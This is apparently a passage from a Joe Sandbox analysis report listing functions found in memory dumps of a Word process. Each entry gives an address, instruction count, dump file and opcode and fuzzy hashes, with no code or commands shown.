                        • Source File: 00000013.00000002.522401959.0000000000F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_19_2_f40000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 10cc7bb0f6b5cd0d6fb284203e768657b60adc034ddb3ba3bf9a6bb5d0b815ec
                        • Instruction ID: 51654ba7b10270b5e3562ea66a0c9f222aa3630aae9dccb111c0a4350ab93998
                        • Opcode Fuzzy Hash: 10cc7bb0f6b5cd0d6fb284203e768657b60adc034ddb3ba3bf9a6bb5d0b815ec
                        • Instruction Fuzzy Hash: 9531BC35A081049FCB14AB64E58436D7BA2EF86311F144566EA02DB3A0FB36DC94EB42
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00F43710 Relevance: .1, Instructions: 60COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000013.00000002.522401959.0000000000F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_19_2_f40000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 6e62091f2678fa692c9f9b9162adb73206801e075cf515d44b20a5cdb9a94a7a
                        • Instruction ID: afae922eeef7e0af9805835417b3709f3bef293de35450ead2a669883d33afb0
                        • Opcode Fuzzy Hash: 6e62091f2678fa692c9f9b9162adb73206801e075cf515d44b20a5cdb9a94a7a
                        • Instruction Fuzzy Hash: 92210671A08244CFC704CF68D419BAE3FF2AB89310F1540AAD446AB791CB356D41DBA2
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00F43A50 Relevance: .1, Instructions: 59COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000013.00000002.522401959.0000000000F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_19_2_f40000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 1c40ac83b61b8461795d89f8e32101c33c0a1d6a504cea99eae64c9181097057
                        • Instruction ID: bcd712b9969640e22274990b441436d1a15750349d282bc731365a6fb101ff91
                        • Opcode Fuzzy Hash: 1c40ac83b61b8461795d89f8e32101c33c0a1d6a504cea99eae64c9181097057
                        • Instruction Fuzzy Hash: D1219A35E4D384AFCB05DF64945469CBFB1EF52314F2484EAC851DB2A2E6381A46EB42
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00F48AF0 Relevance: .1, Instructions: 57COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000013.00000002.522401959.0000000000F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_19_2_f40000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 1d70cc13cc3d5410450e249e9809165cb3dcd84561a82690ec84f4b23d8a69de
                        • Instruction ID: 90c5fa6c7a1dfdecea11018c597f897ccd30b35ea24a65d157d0c1f291add2b9
                        • Opcode Fuzzy Hash: 1d70cc13cc3d5410450e249e9809165cb3dcd84561a82690ec84f4b23d8a69de
                        • Instruction Fuzzy Hash: 3801A133709208AFCB115E49E884A6EBF56EBC93A1F14843AFE0587351DE758C22E750
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00F42BB5 Relevance: .1, Instructions: 55COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000013.00000002.522401959.0000000000F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_19_2_f40000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 250ba3980fba4393b8a560015d4eb811374df2b48adfcbad2f4e4fb58a19dbe5
                        • Instruction ID: 201d7897bfe4cbe12563f8be4d6ca54e1b916363f78198d7b6f13cf05e294078
                        • Opcode Fuzzy Hash: 250ba3980fba4393b8a560015d4eb811374df2b48adfcbad2f4e4fb58a19dbe5
                        • Instruction Fuzzy Hash: FB210934E04218CFDB54DF68D995B9EB7B2FB85310F2184A9E909A7345DB346E42DF40
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00F43730 Relevance: .0, Instructions: 50COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000013.00000002.522401959.0000000000F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_19_2_f40000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: c321e76a6c56bed4d9ffd18b8bf35c5ed16d95f776f6ab97de85b4413abf48c7
                        • Instruction ID: a92ab1ee45bef6f612a9169779b51c9e3c67ff87fd0131d24900803b53e35c76
                        • Opcode Fuzzy Hash: c321e76a6c56bed4d9ffd18b8bf35c5ed16d95f776f6ab97de85b4413abf48c7
                        • Instruction Fuzzy Hash: E511E1B0A04108CFD714DF64D508BAE3BF2EB88320F254069E806A7390CB756E41CFA1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00F437FC Relevance: .0, Instructions: 48COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000013.00000002.522401959.0000000000F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_19_2_f40000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 8bbd9b2c7440c5d86495a00055fc20f86114183503c8dc95dffd925d04c1ae9d
                        • Instruction ID: 8a757a952509bd3309144eb80767d2683f080bd63accef62d3befc707f336188
                        • Opcode Fuzzy Hash: 8bbd9b2c7440c5d86495a00055fc20f86114183503c8dc95dffd925d04c1ae9d
                        • Instruction Fuzzy Hash: AE11CEF1A08204CFD704CF64D858BAE3BF2FB59314F2540A9D842AB2A0DB78AE41DF51
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00F05F15 Relevance: .0, Instructions: 47COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000013.00000002.522335190.0000000000F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F00000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_19_2_f00000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 8baa77f0a823573bce3899b9ae55281c3021b4d3eebb30e190c74cbc1fc3b707
                        • Instruction ID: f6852c59a4e8130934f696d153fdbe94625a3c47a2ad266617a4fb8d5eeae79f
                        • Opcode Fuzzy Hash: 8baa77f0a823573bce3899b9ae55281c3021b4d3eebb30e190c74cbc1fc3b707
                        • Instruction Fuzzy Hash: 5D01F232B0E7918FCF36166568281263B71AB8367231980FBD446CB292CA248C57F751
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00F440C0 Relevance: .0, Instructions: 46COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000013.00000002.522401959.0000000000F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_19_2_f40000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 95f2851459eac0e3eae3e5601b3226dae534ef87915e999fbcf8861070421490
                        • Instruction ID: a6b7e28ca77937ac48107ac670dbe87b436fe88d2f1da0a0bacaf67b354f68e9
                        • Opcode Fuzzy Hash: 95f2851459eac0e3eae3e5601b3226dae534ef87915e999fbcf8861070421490
                        • Instruction Fuzzy Hash: 64018030E09244EFDB05DF68D941769BFB1EB85304F6080AADA05E7251EA346EA5EB01
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00F48AE1 Relevance: .0, Instructions: 44COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000013.00000002.522401959.0000000000F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_19_2_f40000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 013b0cc06fcee4ae801b6849b2374cfbd24a0d6312dfe970ac2db8f4068be8ee
                        • Instruction ID: 569230aaa8b965305f4f6f34666bf7e0cc7f81083c9d40576e28f02735321b65
                        • Opcode Fuzzy Hash: 013b0cc06fcee4ae801b6849b2374cfbd24a0d6312dfe970ac2db8f4068be8ee
                        • Instruction Fuzzy Hash: DFF028337093046FCB021A55AC4197F7F15E7D6390B14843AFE0587381DD615C16F761
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00F4A038 Relevance: .0, Instructions: 43COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000013.00000002.522401959.0000000000F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_19_2_f40000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 7c1ca2efab997f23e3872d85346f560dc411c7d671f3164acc0d98ebf5bbfb60
                        • Instruction ID: 18226fcf65662cab36634ca7a4672823b68f4a7518f834c54e03831a115d6201
                        • Opcode Fuzzy Hash: 7c1ca2efab997f23e3872d85346f560dc411c7d671f3164acc0d98ebf5bbfb60
                        • Instruction Fuzzy Hash: 71115E70D4120ADFDB15CF94D548BEDBBB2FF45304F248555E801AB2A0DBB46E85DB81
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00F43A80 Relevance: .0, Instructions: 43COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000013.00000002.522401959.0000000000F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_19_2_f40000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 900d69137aefb757d684ca8b3affab75a898b74f31afa9d7f85684d189db1430
                        • Instruction ID: f3a8c0f1cadd6807588e1e8e65da3c8264d87050c43827314312a8151e24167f
                        • Opcode Fuzzy Hash: 900d69137aefb757d684ca8b3affab75a898b74f31afa9d7f85684d189db1430
                        • Instruction Fuzzy Hash: AA016935E48208EFCB04EFA9D14569CBBF2FB84304F2084A9C84693350E7785B95EF41
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00F440D0 Relevance: .0, Instructions: 39COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000013.00000002.522401959.0000000000F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_19_2_f40000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 330e1c50f77aa6929ab8214df9c8630a64944c2b981dbf36fa8a78e51eccad10
                        • Instruction ID: e3fa8bfdf87d8bcf8388334d748992ed90c9e51efd4d2fee82267f82c72200a8
                        • Opcode Fuzzy Hash: 330e1c50f77aa6929ab8214df9c8630a64944c2b981dbf36fa8a78e51eccad10
                        • Instruction Fuzzy Hash: 36014B31E09604EFCB04DF69D945B6DBBB2FB84304F6084A9D906A7350EA306EA5EB00
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 04D41D37 Relevance: .0, Instructions: 37COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000013.00000002.527891319.0000000004D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_19_2_4d40000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: d94fce2e18ed8721291c5f63ea3076f5d7682a2122e2656de9ea27286db401eb
                        • Instruction ID: f2d68424e997b95331e87bedbb9b18863d434132071b2bf7ac100c1f64d3adaf
                        • Opcode Fuzzy Hash: d94fce2e18ed8721291c5f63ea3076f5d7682a2122e2656de9ea27286db401eb
                        • Instruction Fuzzy Hash: 57F0E9B6A08604AFD701DF50E58149DBBF5DBC4610F10449AE40597311EB329E179761
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00F431AB Relevance: .0, Instructions: 32COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000013.00000002.522401959.0000000000F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_19_2_f40000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 2a991b4ad8b07e09e1b3071d0cab7bf942a38b3dd6a35d33ad9a37decd490e85
                        • Instruction ID: 287671edbb7dc36271cf9d19750bb0c6a1093b0fa0fc9440a1b623aacc341c60
                        • Opcode Fuzzy Hash: 2a991b4ad8b07e09e1b3071d0cab7bf942a38b3dd6a35d33ad9a37decd490e85
                        • Instruction Fuzzy Hash: CDF05431F501458BDB24AFF5846637E75A25BC8718F204429C516EB394CFB84D019BE6
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00F49D61 Relevance: .0, Instructions: 32COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000013.00000002.522401959.0000000000F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_19_2_f40000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 13344a095db6b1e23a211ad0da0a022b5c4f11d3d12996216fe2da05ddfa6202
                        • Instruction ID: b5b89067aa00fb2779018e46f21d5357f75485ed680180ff4c886a31527806e2
                        • Opcode Fuzzy Hash: 13344a095db6b1e23a211ad0da0a022b5c4f11d3d12996216fe2da05ddfa6202
                        • Instruction Fuzzy Hash: F5F0B471F4C4904FDB19DB14D4656E6BF60EFA6310F0881D5DC998B383C666DC52DB81
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 04D43B30 Relevance: .0, Instructions: 32COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000013.00000002.527891319.0000000004D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_19_2_4d40000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 2e18cb8af5ab4e367719dc99dc1e4767b5babaa2901876598f8f0e7a2aee04cb
                        • Instruction ID: b1b6cb207670fb8264194d76053a710f3257fe73be3c5efb9d31c499f2df3413
                        • Opcode Fuzzy Hash: 2e18cb8af5ab4e367719dc99dc1e4767b5babaa2901876598f8f0e7a2aee04cb
                        • Instruction Fuzzy Hash: B4F03C30A04508CFDB40EFA8D950A9EB7B2FB89304F108625E546A7354EF34A9999B51
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00F4C075 Relevance: .0, Instructions: 30COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000013.00000002.522401959.0000000000F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_19_2_f40000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 4ffe897c23864de5de2630806f8cc99c1a3405d1af63226a374aa1c86a1499c1
                        • Instruction ID: b43eddd6cd5d07abb01a0ca438a51174fde2735542bb842ca5f969c2d5eeb748
                        • Opcode Fuzzy Hash: 4ffe897c23864de5de2630806f8cc99c1a3405d1af63226a374aa1c86a1499c1
                        • Instruction Fuzzy Hash: BFF0827260E3E05FC7438B18C8615997F70AF97304B1A84DBD480CB5A3C6218C1AC7A2
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00F48D4F Relevance: .0, Instructions: 30COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000013.00000002.522401959.0000000000F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_19_2_f40000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: b363ed19671082678d2406daa12e8da202136a83d4fb94970b54718ec534615b
                        • Instruction ID: 03510a34caf4d282b1fb64db24a23864b09f164cc757768acbf28c3bd9a2ae9b
                        • Opcode Fuzzy Hash: b363ed19671082678d2406daa12e8da202136a83d4fb94970b54718ec534615b
                        • Instruction Fuzzy Hash: 8AF0BE32E06108AFCB158E48E840AAA7B76EB99360F144026FC05A3390CE758CA2EB00
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00F481B7 Relevance: .0, Instructions: 28COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000013.00000002.522401959.0000000000F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_19_2_f40000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: faa4d4c712b079de9c99e522c1cb7ad863d217b161fcce8c9bafb9b083e209b1
                        • Instruction ID: 1cd3d558bee667ddcea3f513c064771ad61bd773a1c1407e41333732b35cc022
                        • Opcode Fuzzy Hash: faa4d4c712b079de9c99e522c1cb7ad863d217b161fcce8c9bafb9b083e209b1
                        • Instruction Fuzzy Hash: 4BF0E53270C2946FCB036758AC2496B7FA9DBC6321F04846FF181C7292C9658C1693A2
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00F4A9B0 Relevance: .0, Instructions: 28COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000013.00000002.522401959.0000000000F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_19_2_f40000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: a029ed7a0341831efa8352283b7a948e88b9d26475fab8699a946f0c2002c6f6
                        • Instruction ID: c794788da3931a9f411f6a4fc4b402e78538abcc11111526b52863917120beaa
                        • Opcode Fuzzy Hash: a029ed7a0341831efa8352283b7a948e88b9d26475fab8699a946f0c2002c6f6
                        • Instruction Fuzzy Hash: 73E012721481A82EC716CA999C508B67FEC595E2117098097F994C6293C565ED029772
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00F4D6A8 Relevance: .0, Instructions: 26COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000013.00000002.522401959.0000000000F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_19_2_f40000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 5420abbc6bd0658e6c9730c06bb5b783b116166d9b4700ea463a3325dd6877e4
                        • Instruction ID: 69e4dcd3264a8e00757f0f5308500361e1c9bea8c10ec2e9b06fa7cb83c3cbfa
                        • Opcode Fuzzy Hash: 5420abbc6bd0658e6c9730c06bb5b783b116166d9b4700ea463a3325dd6877e4
                        • Instruction Fuzzy Hash: 27E0C2327082246B0614265A788493FBA9FE7CA775329453AFE0993740DD616C1167E1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00F48DE8 Relevance: .0, Instructions: 26COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000013.00000002.522401959.0000000000F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_19_2_f40000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 72a511489e48c6589ee8b2cfab70c3f9ae05b5457d72e969292cd0a0bc1121c5
                        • Instruction ID: 5c57ed623efabe570540d0a8ac2c09816f47912fd9a118b7b1e9c6e1ad5e9a34
                        • Opcode Fuzzy Hash: 72a511489e48c6589ee8b2cfab70c3f9ae05b5457d72e969292cd0a0bc1121c5
                        • Instruction Fuzzy Hash: D5E09232505258AFCB028F84DC01CB67F79EB6A350704C08BFD05872A2CA72DC23E7A1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00F48237 Relevance: .0, Instructions: 25COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000013.00000002.522401959.0000000000F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_19_2_f40000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 287ea5b72e1e7d4366387057a9c729720f759d804ba35021281d77855abf3bd1
                        • Instruction ID: 053333d8d048c459c579b2d7426e0f54e6aaca4f366164c712f84a1d572b9bf4
                        • Opcode Fuzzy Hash: 287ea5b72e1e7d4366387057a9c729720f759d804ba35021281d77855abf3bd1
                        • Instruction Fuzzy Hash: 77E086312092587FCB02CE54DC518B57F79EF8A220705C09BFD89CB262C6B2AC13D7A1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00F48B98 Relevance: .0, Instructions: 25COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000013.00000002.522401959.0000000000F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_19_2_f40000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: cd2fc5718d059ae395228a4fe97106526a01f94f2aafbb6a7dc639ec4542404f
                        • Instruction ID: b282a54aae918b747c84e01363906556ed095ca4a99ac5989fc0b175aaa005cc
                        • Opcode Fuzzy Hash: cd2fc5718d059ae395228a4fe97106526a01f94f2aafbb6a7dc639ec4542404f
                        • Instruction Fuzzy Hash: 37E0D8B390D24C9E87029F50AD014AE7FA8EA5724171100E2D941D7291EE715A01A7D1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 04D44C20 Relevance: .0, Instructions: 24COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000013.00000002.527891319.0000000004D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_19_2_4d40000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 36efc0d4b1e0f94b0174edab69a28cb484ec487364fbb88d2db975fc1baf61ea
                        • Instruction ID: 8af9f828fb66bf308e916d5c1031e9362a379f9ef42d0eeec6b1b1fc82a98153
                        • Opcode Fuzzy Hash: 36efc0d4b1e0f94b0174edab69a28cb484ec487364fbb88d2db975fc1baf61ea
                        • Instruction Fuzzy Hash: 0CE0C03151060C9FCB01EE98D8418D9BB79EF4A214B01C25AFD4467210EB71E965DBD1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00F46067 Relevance: .0, Instructions: 23COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000013.00000002.522401959.0000000000F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_19_2_f40000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: e7533bc956e4b4acc5d8dc566e214544f0f5f360a794021a973b02e554574623
                        • Instruction ID: 46ea538c010569ebc4b1435e54d615fdc75ff0cf7539e19bbaf2fb72d932d42f
                        • Opcode Fuzzy Hash: e7533bc956e4b4acc5d8dc566e214544f0f5f360a794021a973b02e554574623
                        • Instruction Fuzzy Hash: 5CE0C27110C2905FC351DB28D852966BFF8CE8B50070985DFB481D3252C418CC0BD773
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00F4A598 Relevance: .0, Instructions: 23COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000013.00000002.522401959.0000000000F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_19_2_f40000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 784cf3b8954591fa264e3e8c172aaf046591272b4b7d2b94b5dfdc5d9f20e16f
                        • Instruction ID: fd962f3be7262a70575a19462282a2d12cdeb2632b857ba9ceca559bfdb0471d
                        • Opcode Fuzzy Hash: 784cf3b8954591fa264e3e8c172aaf046591272b4b7d2b94b5dfdc5d9f20e16f
                        • Instruction Fuzzy Hash: C6E04F6124C3B05FC316C6149A20866BFE95EDB601B0C848FA881D72A2D515DD06D773
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 04D49448 Relevance: .0, Instructions: 23COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000013.00000002.527891319.0000000004D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_19_2_4d40000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: a0d223acb7c37efcf9538b4a271bde3a9eacaedbf4c5a239a7a437c2809a40a2
                        • Instruction ID: c2e9493fe3de099b78a5b1373786a502211857331c69b17d678c12d8f4c45d4b
                        • Opcode Fuzzy Hash: a0d223acb7c37efcf9538b4a271bde3a9eacaedbf4c5a239a7a437c2809a40a2
                        • Instruction Fuzzy Hash: B8E048351041546FD702DF54DC118E57F75EF89210709C09AFD5587252C676DD23DBA1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00F481C8 Relevance: .0, Instructions: 21COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000013.00000002.522401959.0000000000F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_19_2_f40000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 7205bfa31c0a9f6ac2f4d3b14a7988cbf63fa8575d805d749d662a719461bf69
                        • Instruction ID: 517d9063e277acf506246b3014ca5695b354bec515fdb56a6e37cbd0418c15e3
                        • Opcode Fuzzy Hash: 7205bfa31c0a9f6ac2f4d3b14a7988cbf63fa8575d805d749d662a719461bf69
                        • Instruction Fuzzy Hash: 8CD01233704518ABDB055A8DEC11EAB779ED7C9722F048426F60597241CAB69C2567E0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00F48AA7 Relevance: .0, Instructions: 21COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000013.00000002.522401959.0000000000F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_19_2_f40000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: e5171c30743223a4425f08ff1ecd768e5f3303fe919389f36a0fb4162d06b451
                        • Instruction ID: 330bf6e619bff6b371dc04c14e901a9f5f94042364665d3a676cbc51380cbf76
                        • Opcode Fuzzy Hash: e5171c30743223a4425f08ff1ecd768e5f3303fe919389f36a0fb4162d06b451
                        • Instruction Fuzzy Hash: 61E04F325041546FCB018E54D8519E57B66EF95210B15805AB848C7252CA728D12DB50
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00F49DC8 Relevance: .0, Instructions: 21COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000013.00000002.522401959.0000000000F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_19_2_f40000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 50b9b307c5d68725bdd5f5f53537a49fab2a89e0eb9105e8a3e9f29d65bbcfe2
                        • Instruction ID: bfbfd0270ffa30fd5e9c1c4a41173e1a3458e88512c0c53ed1be3e078ce561ea
                        • Opcode Fuzzy Hash: 50b9b307c5d68725bdd5f5f53537a49fab2a89e0eb9105e8a3e9f29d65bbcfe2
                        • Instruction Fuzzy Hash: 6DE04F725481A86FC742CEA8D8508E57F75DB86220704849BF889D7252C6B28D12DB60
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00F4C9F8 Relevance: .0, Instructions: 20COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000013.00000002.522401959.0000000000F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_19_2_f40000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 91d7c31ca47c0d7f2abe16a744007dfd897054451eaacd3042244a3cc81e40b6
                        • Instruction ID: 37207a455fa41e98c41859ad3d2e52436c165f78e08b85d6aeacaee323ac131b
                        • Opcode Fuzzy Hash: 91d7c31ca47c0d7f2abe16a744007dfd897054451eaacd3042244a3cc81e40b6
